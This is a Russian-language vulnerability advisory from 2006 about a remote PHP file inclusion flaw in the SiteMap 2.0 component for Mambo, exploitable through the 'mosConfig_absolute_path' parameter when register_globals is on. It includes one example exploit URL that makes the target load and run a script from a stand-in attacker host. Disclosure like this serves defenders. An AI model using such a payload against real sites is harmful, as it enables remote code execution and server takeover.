PHP-инклюдинг в Mambo SiteMap

Дата публикации:
15.07.2006
Дата изменения:
17.10.2006
Всего просмотров:
2288
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
SiteMap 2.x (компонент к Mambo)
Уязвимые версии: SiteMap (компонент Mambo) 2.0, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии omponents/com_sitemap/sitemap.xml.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt?

URL производителя: mamboxchange.com/projects/sitemap/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Multiple Mambo/Joomla Component Remote File Include Vulnerabilities

или введите имя

CAPTCHA